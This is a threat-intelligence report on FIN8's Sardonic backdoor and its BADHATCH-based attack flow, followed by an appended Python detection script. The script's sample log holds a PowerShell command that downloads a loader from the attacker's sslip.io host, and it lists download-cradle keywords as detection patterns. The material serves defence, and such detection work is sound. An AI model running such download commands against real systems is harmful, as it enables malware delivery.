FIN8 Threat Actor Goes Agile with New Sardonic Backdoor

August 26, 2021

Since January 2016, FIN8 has been steadily building a reputation among financially motivated advanced threat actors. Bitdefender researchers are constantly monitoring this group’s activity, and previous research released in early 2021 documented the use of a new, improved version of the BADHATCH backdoor.

This whitepaper focuses on the analysis of a new backdoor component discovered during a forensic investigation, described here.

As this backdoor has not been documented or referenced before, we named it “Sardonic”, given that artifacts led us to believe the threat actors use this name for an entire project including the backdoor itself, the loader and some additional scripts. We believe this project is still under development, and additional updates will likely follow.

Key facts about Sardonic:

Attack Flow

The attack described in this whitepaper was uncovered after a FIN8 infection at a financial institution in the US. While we couldn’t identify how the attackers gained initial access to the network, FIN8 is known for using social engineering and spear-phishing tactics to infiltrate target organizations.

As described in our previous threat intelligence report on FIN8, once in the network, the attackers began with network reconnaissance, obtaining information about the domain (users, domain controllers) and continued with lateral movement and privilege escalation. In addition to the use of WMIExec, which we reported earlier, we found traces of SMBExec from the same toolset (Impacket), along with, of course, the offensive features of their signature backdoor, BADHATCH.

The BADHATCH loader was deployed using PowerShell scripts downloaded from the 104.168.237[.]21 IP address using the legitimate sslip.io service. It was used during the reconnaissance, lateral movement, privilege escalation and possibly impact stages.

There were multiple attempts to deploy the Sardonic backdoor on domain controllers in order to continue with privilege escalation and lateral movement, but the malicious command lines were blocked. We saw no traces of BADHATCH on these high-value targets. However, we identified one SQL server where some artifacts indicate that the threat actors intended to deploy both backdoors.
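The loader delivery described above (PowerShell scripts fetched from an IP address through the sslip.io wildcard-DNS service) is something a defender can hunt for in process-creation telemetry. The following detection logic is an added example and is not code from the report or from Bitdefender: it decodes the IPv4 address embedded in a sslip.io-style hostname (sslip.io resolves names such as `104-168-237-21.sslip.io` or `104.168.237.21.sslip.io` to the embedded address) and flags command lines that download from such a host. The log lines are constructed for the example; only the IP address comes from the report.

```python
import re
from typing import Dict, List, Optional, Tuple

# Wildcard-DNS services that resolve an IP embedded in the hostname.
# sslip.io is the service named in the report; extend the tuple as needed.
WILDCARD_DNS_SUFFIXES = ("sslip.io",)

URL_RE = re.compile(r"""https?://([^/\s'"]+)""", re.IGNORECASE)
# An IPv4 address written with dots or dashes at the end of the label part,
# optionally preceded by arbitrary extra labels (e.g. foo.1-2-3-4.sslip.io).
EMBEDDED_IP_RE = re.compile(r"(?:^|\.)(\d{1,3})[.-](\d{1,3})[.-](\d{1,3})[.-](\d{1,3})$")
# Common PowerShell download/execute primitives used as a secondary signal.
DOWNLOAD_CRADLE_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-Expression|\biex\b",
    re.IGNORECASE,
)


def embedded_ip(hostname: str) -> Optional[str]:
    """Return the dotted IPv4 encoded in a wildcard-DNS hostname, else None."""
    host = hostname.lower().split(":")[0]  # drop any port suffix
    for suffix in WILDCARD_DNS_SUFFIXES:
        if host == suffix:
            return None  # bare service domain, nothing embedded
        if host.endswith("." + suffix):
            label_part = host[: -len(suffix) - 1]
            m = EMBEDDED_IP_RE.search(label_part)
            if m and all(int(octet) <= 255 for octet in m.groups()):
                return ".".join(m.groups())
    return None


def analyze_command_line(cmdline: str) -> List[Dict[str, object]]:
    """Return one finding per URL in the command line that uses a wildcard-DNS host."""
    findings: List[Dict[str, object]] = []
    for m in URL_RE.finditer(cmdline):
        ip = embedded_ip(m.group(1))
        if ip is not None:
            findings.append(
                {
                    "host": m.group(1),
                    "resolved_ip": ip,
                    "download_cradle": bool(DOWNLOAD_CRADLE_RE.search(cmdline)),
                }
            )
    return findings


def scan_logs(lines: List[str]) -> List[Tuple[int, List[Dict[str, object]]]]:
    """Run analyze_command_line over each log line; return (index, findings) for hits."""
    hits = []
    for i, line in enumerate(lines):
        findings = analyze_command_line(line)
        if findings:
            hits.append((i, findings))
    return hits


# Constructed process-creation log lines (not from the report). The first one
# embeds the IP the report attributes to the loader download; the rest are
# benign-looking activity that must not be flagged.
SAMPLE_LOGS = [
    "powershell.exe -c \"Invoke-WebRequest 'http://104-168-237-21.sslip.io/loader.ps1' -OutFile C:\\Temp\\l.ps1\"",
    "powershell.exe -c \"Invoke-WebRequest 'https://www.example.com/update.ps1' -OutFile C:\\Temp\\u.ps1\"",
    "cmd.exe /c whoami /all",
]

if __name__ == "__main__":
    for index, findings in scan_logs(SAMPLE_LOGS):
        print(f"line {index}: {findings}")
```

The wildcard-DNS match is the primary signal; `download_cradle` is recorded separately so the two can be weighted differently in a rule, since legitimate developers also use sslip.io for local testing.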
